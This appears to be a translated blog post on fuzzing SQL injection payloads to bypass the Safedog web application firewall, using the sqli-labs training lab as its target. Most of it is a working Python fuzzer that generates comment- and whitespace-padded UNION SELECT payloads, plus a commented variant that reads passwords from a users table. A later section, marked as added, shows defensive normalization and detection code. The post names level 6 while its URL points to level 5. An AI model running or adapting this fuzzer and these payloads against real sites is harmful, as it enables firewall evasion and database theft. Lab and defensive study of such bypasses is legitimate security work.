Using fuzzing to get SQL injection past Safedog (安全狗)


Taking level 6 of sqli-labs as the example.

Bypass

The payload here

It is able to dump the table names and column names.

# -*- coding: utf-8 -*-
import threading
from queue import Queue, Empty

import requests

# Filler strings that are tried between the SQL keywords
fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00']
fuzz_sz = ['',' ']
fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"]
Fuzz = fuzz_ch + fuzz_sz + fuzz_zs


class fuzz:
    def __init__(self, root, ThreadNum=5):
        # Use the arguments instead of the hard-coded values
        self.root = root
        self.ThreadNum = ThreadNum
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) '
                          'AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20',
            'Referer': 'http://www.camel.com',
            'Cookie': 'whoami=digo8',
        }
        self.task = Queue()
        # Every combination of four fillers placed between "union" and "select"
        for a in Fuzz:
            for b in Fuzz:
                for c in Fuzz:
                    for d in Fuzz:
                        exp = self.root + "' /*!union" + a + b + c + d + "select*/" + " 1,2,3 --+"
                        # Alternative payload that reads a column from the users table:
                        # exp = self.root + "' /*!union" + a + b + c + d + "select*/" + " 1,2,password /*!from " + a + b + c + d + "users*/--+"
                        self.task.put(exp)
        self.s_list = []

    def visit(self, url):
        # Fetch the URL and return the response body ("" on a connection error)
        try:
            r = requests.get(url, headers=self.headers, timeout=10)
            ret = r.text
        except requests.RequestException:
            print("Fail to connect...")
            ret = ""
        return ret

    def test_url(self):
        while True:
            # get_nowait() avoids blocking forever when another thread
            # takes the last item between an empty() check and get()
            try:
                url = self.task.get_nowait()
            except Empty:
                break
            ret = self.visit(url)
            # "Dhakkan" appears in the lab page when the request was served normally
            if "Dhakkan" in ret and "error" not in ret:
                self.s_list.append(url)
                print(url)

    def work(self):
        threads = []
        for i in range(self.ThreadNum):
            # Pass the method itself; calling it here would run everything in the main thread
            t = threading.Thread(target=self.test_url)
            threads.append(t)
            t.start()
        for t in threads:
            t.join()


obj = fuzz("http://192.168.1.109/sqli/Less-5/?id=1")
obj.work()
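
Seen from the defending side, the filler strings fuzzed above only work against a filter that matches the raw request text. The following added example (not part of the original post; the function names and the sample values are constructed for illustration) unwraps MySQL executable comments and whitespace variants before matching, and compares the result with a literal keyword check:

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*! ... */ (optionally /*!50000 ... */), so the
# opener is dropped and the body kept; ordinary /* ... */ comments are removed.
EXEC_COMMENT_OPEN = re.compile(r"/\*!\d*")
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s*\(?\s*select\b")


def normalize(raw_value):
    """Reduce a raw query-string value to one canonical, lower-case form."""
    text = unquote_plus(raw_value)             # %0a -> newline, '+' -> space
    text = EXEC_COMMENT_OPEN.sub(" ", text)    # unwrap executable comments
    text = PLAIN_COMMENT.sub(" ", text)        # plain comments act as separators
    text = text.replace("*/", " ")             # closers left by the unwrapping
    return re.sub(r"\s+", " ", text).strip().lower()


def naive_match(raw_value):
    """Literal keyword check of the kind the filler strings slip past."""
    return "union select" in unquote_plus(raw_value).lower()


def normalized_match(raw_value):
    """Keyword check applied after normalization."""
    return bool(UNION_SELECT.search(normalize(raw_value)))


# Constructed sample values for the `id` parameter (not captured traffic).
SAMPLES = [
    "1' /*!union%0aselect*/ 1,2,3 --+",
    "1' /*!union/**/select*/ 1,2,3 --+",
    "1' UNION+ALL+SELECT 1,2,3 --+",
    "1",
    "student union",
]


def scan(values):
    """Return (value, naive verdict, normalized verdict) for each input."""
    return [(v, naive_match(v), normalized_match(v)) for v in values]


if __name__ == "__main__":
    for value, naive, normalized in scan(SAMPLES):
        print(f"naive={naive!s:5} normalized={normalized!s:5} {value!r}")
```

Keyword matching of this kind is a detection aid and will also fire on ordinary text that happens to contain the words; the injection itself is closed by binding `id` as a query parameter in the application.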

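Copyright notice: unless otherwise noted, every article here is an original work by 《花落》; please keep the source attribution when reposting.

Permalink: fuzz方法注入绕过安全狗 - http://www.9bwl.com/post-150.html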
